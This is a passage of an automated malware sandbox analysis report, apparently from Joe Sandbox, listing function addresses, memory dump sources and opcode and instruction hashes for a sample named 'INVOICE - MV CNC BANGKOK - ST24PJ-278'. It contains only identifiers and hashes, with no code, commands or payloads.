                                            • Instruction ID: 0ea63ae2e01e5634fd98d8bdc7675a92029659f365a134fb3a87e987cc7ebf05
                                            • Opcode Fuzzy Hash: 4e789951a598df2607e063da60b19f5ff5da379e3f472aaede306b23a6daf21e
                                            • Instruction Fuzzy Hash: EF012171A10209EBCB04DFA9D4519EEB7F8FF58744F50806AF914EB351D774A901CBA4
                                            Function 011562D6 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 151f507e7e2e0534966830c9525299131aea08fe21b145f0115ae8c49651f87e
                                            • Instruction ID: 233a9b8c3df98927164a5c3b07b106c92ab8dc25e9d0933dbf76f3e54afc643e
                                            • Opcode Fuzzy Hash: 151f507e7e2e0534966830c9525299131aea08fe21b145f0115ae8c49651f87e
                                            • Instruction Fuzzy Hash: FE017171A00209EBCB04DFA9D4519DEB7F8FF58700F50802AF914EB351D7749900CBA0
                                            Function 010BCA6F Relevance: .0, Instructions: 42COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                            • Instruction ID: 61285021eb221eeb109b52b717d134e4971991d0c2de796583fd278592084896
                                            • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                            • Instruction Fuzzy Hash: F401F9312006859BE722971DC949FDABBD8EF41754F0880AAFB848FA91DBB5D800C650
                                            Function 011561E5 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f66496c196d88bec094862d35c032b26084e9c90b4b4203c6b39fa618f4cb145
                                            • Instruction ID: bd21017f5f2d9116e432cafb599400fc351e3ff125cdb4536808e276556c2d24
                                            • Opcode Fuzzy Hash: f66496c196d88bec094862d35c032b26084e9c90b4b4203c6b39fa618f4cb145
                                            • Instruction Fuzzy Hash: 72018F71A00249DBCB04DFA9D851AEEBBF8BF58710F14405AF900EB390D734EA01CB94
                                            Function 011063C0 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                            • Instruction ID: b959a159741f2eb284415f3adadc5c0feba1f93b9a031c214e45803bc9b509da
                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                            • Instruction Fuzzy Hash: 2CF01D7220001DBFEF029F94DD80DEF7B7EEB59298B114125FA1196160D771DD21EBA0
                                            Function 0110A4B0 Relevance: .0, Instructions: 40COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8835b174b0a87f9ad0bfe7e225831a09fe3772ded33c40b3e05e8908ab6fc7ac
                                            • Instruction ID: f687e12aef0bafe31c9e123c3140c2ab106ae2fcc4fedfe2bf6a998d29306258
                                            • Opcode Fuzzy Hash: 8835b174b0a87f9ad0bfe7e225831a09fe3772ded33c40b3e05e8908ab6fc7ac
                                            • Instruction Fuzzy Hash: 71018536500209ABCF169E84E840EDA3F66FF4C764F068111FE2866260C336D9B0EB81
                                            Function 0107C0F0 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bebc0d53472fa2d976089b83a8d7010f687971ea7d37c3b4bf8f8a83a58a0d7c
                                            • Instruction ID: 5f05fc2ce4108e2eb281802160b57ebe81bb1bed3ae9ede7e6dbcd6edd375d3f
                                            • Opcode Fuzzy Hash: bebc0d53472fa2d976089b83a8d7010f687971ea7d37c3b4bf8f8a83a58a0d7c
                                            • Instruction Fuzzy Hash: 2FF02472B043825BF3909619EE01B6337DAE7C1755F6980BAEB858B2C1F9B1DC01C398
                                            Function 010B656A Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ed82f35cdd28581ccc7bf20a4e90f81eafe99ae4b0a8aa9a5b43bc6ffc2524c3
                                            • Instruction ID: beea38ffc680525e5d045f2cc8b74bb31c58cf7210e60c415545b730f2492c6f
                                            • Opcode Fuzzy Hash: ed82f35cdd28581ccc7bf20a4e90f81eafe99ae4b0a8aa9a5b43bc6ffc2524c3
                                            • Instruction Fuzzy Hash: C601F4702016818BF3629B3CCC98FAA37E4FB00B04F4841E4BA91CBAD2E729D4418610
                                            Function 0112437C Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                            • Instruction ID: caf5cc4eafb636e3a5c2bc7b32ee7c22f6dba8ea644aec43e60ba3a97fb310ec
                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                            • Instruction Fuzzy Hash: 1DF0E931349D3387EB3EAA2FC820B6AA655AF90E00B05052CD652CBA80DF20DC108780
                                            Function 0110E872 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                            • Instruction ID: 20c82ff65cc0f0f0f9dc9fb4328a1a2c12f66bb99b43535c61f2b1e1ca6749e8
                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                            • Instruction Fuzzy Hash: 56F0B432B025519BE72A8A4FCC80F12B768AFD5A60F1A0426A6049B2A0C3A0ED018BD0
                                            Function 0110C89D Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32e86ee828b0ae882fd0b92311c3335224ce8e13d67efeb48bd988698276e410
                                            • Instruction ID: 624e006f7b82d179b3162b52a196bbe316c554ee066906b519965e7ae7358dfe
                                            • Opcode Fuzzy Hash: 32e86ee828b0ae882fd0b92311c3335224ce8e13d67efeb48bd988698276e410
                                            • Instruction Fuzzy Hash: ECF08C716197049FC314EF28C851A5AB7E4FF98710F40865AB898DB390E634EA00CB96
                                            Function 010B0854 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                            • Instruction ID: 4153cd6bfd72f894c7157d5da5454e8061d3fc112956c8872a73c82644ca450b
                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                            • Instruction Fuzzy Hash: 5AF02472600204AFE714DB21CC00F87B6F9EF98300F148079A5C4C7164FAB1DE00C654
                                            Function 0110C912 Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ad10abe2d21eee47232526df538393956b4c1abaad46bd64bbfc04307b3caaee
                                            • Instruction ID: b2f56cf72534fbdaa0d18e475416fa79af4a58fcaf2c12006ce6349bacddd311
                                            • Opcode Fuzzy Hash: ad10abe2d21eee47232526df538393956b4c1abaad46bd64bbfc04307b3caaee
                                            • Instruction Fuzzy Hash: 70F0AF70A012099FCB08EF69C561A9EB7B4FF18300F008169B855EB395EA74EA01CF90
                                            Function 010847FB Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e0bcf6d63a5cd6041bf82e0201ce2e806ec428fd8c1ab9eb0303ad607f9a4cb
                                            • Instruction ID: 29996b511fac7f96b21dd5df1f9e8abb048415e864f8ed1bdee311fbbe94430b
                                            • Opcode Fuzzy Hash: 8e0bcf6d63a5cd6041bf82e0201ce2e806ec428fd8c1ab9eb0303ad607f9a4cb
                                            • Instruction Fuzzy Hash: EEF0F03192A2E7DFE7B2AF1CC004B297BC49B00A28F0948AAD9C9C3602C334D880C600
                                            Function 01140115 Relevance: .0, Instructions: 32COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43c1453d9eb815c5558f5037f5d472f1932d9efebb212dadf001569ae0f21235
                                            • Instruction ID: 8e533a4df90899a9f8b094092865570418da4e2d8f9cfcd4d766134a1665a17c
                                            • Opcode Fuzzy Hash: 43c1453d9eb815c5558f5037f5d472f1932d9efebb212dadf001569ae0f21235
                                            • Instruction Fuzzy Hash: 5EF02766419A814BEF3E6B3C78542D16B74A789E14F091455E5B267309C774C8C3C321
                                            Function 010BC5ED Relevance: .0, Instructions: 31COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 76851e5fc88fa2da4d46918ece93e8cc0588ac30f33fe9481c4de12213140279
                                            • Instruction ID: 08b30abefa4287b1323a6920e065eba88cadf0e9fedae09db0821db6f850b654
                                            • Opcode Fuzzy Hash: 76851e5fc88fa2da4d46918ece93e8cc0588ac30f33fe9481c4de12213140279
                                            • Instruction Fuzzy Hash: 5FF0E2B16116919FF7B2971CC3C8FD17BD49F887A4F08A8A5D8C6C7512C374E880CA54
                                            Function 010C2619 Relevance: .0, Instructions: 31COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                            • Instruction ID: c923df8627eda9c79a36a4edc5a9139070128b58e9de11515f50b2655bda14c9
                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                            • Instruction Fuzzy Hash: 64E09232300A016BE7129F598C84F8B77AE9F96B10F04007DB5045E251C9E29C0986A4
                                            Function 01116030 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                            • Instruction ID: f598f9a34988b436aa647e69492a721334417cf4433e5aed44d148e132de4c2d
                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                            • Instruction Fuzzy Hash: 91F01C721046049FE7298F49D944B52B7B8EB05364F56C026E6099B561D3BAEC40CBA4
                                            Function 01080710 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                            • Instruction ID: fee71926748f3c39b25ba00ff7e597a5bf2b996e96446966767f6438b071c11e
                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                            • Instruction Fuzzy Hash: 46F0E5396087459BEB16EF19D050A9A7BE4FB41360B410094F8C68F301D731E982DB94
                                            Function 010B49D0 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                            • Instruction ID: 450e40e1e933c6ab85885c26323809b59b61bcb7544e244e00d3c220a47d7fcc
                                            • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                            • Instruction Fuzzy Hash: A8E0D832344145ABD7222A598840BEA77E5DBD47A0F150429E282CB352DB70DD40D7DC
                                            Function 01154164 Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4568ba849d05eea4e02355b9a2ad52544224e73982bf42af0134886011471fff
                                            • Instruction ID: bd07bc26535e982d1bf5d2a3f08452df45e40a2dfb38b93661316abd570eca9b
                                            • Opcode Fuzzy Hash: 4568ba849d05eea4e02355b9a2ad52544224e73982bf42af0134886011471fff
                                            • Instruction Fuzzy Hash: 4FF0A035A25591CFE7FAD728D180B5277E0AB10630F0A0554D86087D12E334ECC0C650
                                            Function 0112678E Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                            • Instruction ID: 1a9dcf5d5d9cffc46d59b4e93735b7b970e9e5e312c6b322079cfdf1add6b7a3
                                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                            • Instruction Fuzzy Hash: 06E0DF32A00520BBDF26A7998D01FDABEACDB94FA0F050065FA01E70D4E630DE00D690
                                            Function 011508C0 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                            • Instruction ID: 724eed4ce0e69f651ae3551b31332a672e27802c804a66c9b9bad260949a7074
                                            • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                            • Instruction Fuzzy Hash: D5E09B31A40350DBCB698A5DC140F53B7E8DF99764F15806DEE3547612C331F842C6D0
                                            Function 010825E0 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 76c6c02363ecdd46bf326603a8921956f26bd1268785f1eec154012edb5d7b1a
                                            • Instruction ID: 5adf7d669d25d98d20f7fe9e99324255000d60307b49fed8c2e79a7cd6230508
                                            • Opcode Fuzzy Hash: 76c6c02363ecdd46bf326603a8921956f26bd1268785f1eec154012edb5d7b1a
                                            • Instruction Fuzzy Hash: 7BE092721009949BC725BB29DD01FCA7BAAEB64764F014529B19597190CA30A950CB84
                                            Function 0113A456 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                            • Instruction ID: b59b872e0bbb37beb7ab1e1afd312aa1723ff3e2db7ac95f58008eb7266e2dd9
                                            • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                            • Instruction Fuzzy Hash: 0AE09231010A51DFE73A6F2AD958B92BAE0BF90711F188C2CA0DA424B0C77598C0CA40
                                            Function 01104000 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                            • Instruction ID: 89cfefa9f960197d98f714bc3b0b901a160b8b7ae0f15ca7b892f573ef75bd89
                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                            • Instruction Fuzzy Hash: 78E0C9347003058FE715CF19C080B927BB6BFD5610F28C068A9488F649EB72E842CB40
                                            Function 010BCA38 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65012af40ece81511b7848d85662e616514b6e7c24773836d7a8abcfed5d405c
                                            • Instruction ID: 7a3a1c8090b17b42a02bf663493bb338606c6a160d425740128cbf310e7a5599
                                            • Opcode Fuzzy Hash: 65012af40ece81511b7848d85662e616514b6e7c24773836d7a8abcfed5d405c
                                            • Instruction Fuzzy Hash: C1D02E324C10206AEF7AF269BE94FE33AA9AB64324F0688B1F18892020D524CC8193D4
                                            Function 00417DAE Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08c0b20ed55053179e6cf98f4cc3c1a08a687e920264a2f8d6503637e17e2b1b
                                            • Instruction ID: b94bd5ecff4a44a035034db5c6633c208a231828b8eb10e3378df2587cf5d861
                                            • Opcode Fuzzy Hash: 08c0b20ed55053179e6cf98f4cc3c1a08a687e920264a2f8d6503637e17e2b1b
                                            • Instruction Fuzzy Hash: FED02202BCA0780506814438F4014F4FBA0C283831B0873E3DD08DF4028006C086029C
                                            Function 0107823B Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                            • Instruction ID: 6458ae04a6b702055a2143919cb08ab2912c8ee193ce826a591136033011747f
                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                            • Instruction Fuzzy Hash: 73E08C31900A54EEDB322F26DC04B9976A1FB54B11F11886AE0CA0A8A48A70AC82DF48
                                            Function 01082050 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0ba260107d366da611866c9488d7141de65dd43c98f868e50dc302ba4010b53
                                            • Instruction ID: 1c7859dfa3a5cd826b463a7365f17a89bf003bf67324a14ee3e345889376b68d
                                            • Opcode Fuzzy Hash: f0ba260107d366da611866c9488d7141de65dd43c98f868e50dc302ba4010b53
                                            • Instruction Fuzzy Hash: D7E0C232100894ABC721FB6DDD10F8A77AEEFA4260F000121F1D4CB290CA20AD40C794
                                            Function 010B8A90 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                            • Instruction ID: 84cfd6f85015ffcccb186f46f53dbcdadbbf0b0b6a7ebc12e0a59b2c27a7d613
                                            • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                            • Instruction Fuzzy Hash: BEE08633115A1487D728EE18D551BB677E8EF45720F09863EA65347790C534E544CB94
                                            Function 010D6AA4 Relevance: .0, Instructions: 17COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                            • Instruction ID: e9f55c19d5cb3e7b36c14ac270b79eb3a5faf432e18ec4d272da44e26382f3ac
                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                            • Instruction Fuzzy Hash: 27D05E36511A50AFC7329F1BEA00C53BBF9FBD4A10706066EA58583924C671A806DFA0
                                            Function 010BE59C Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
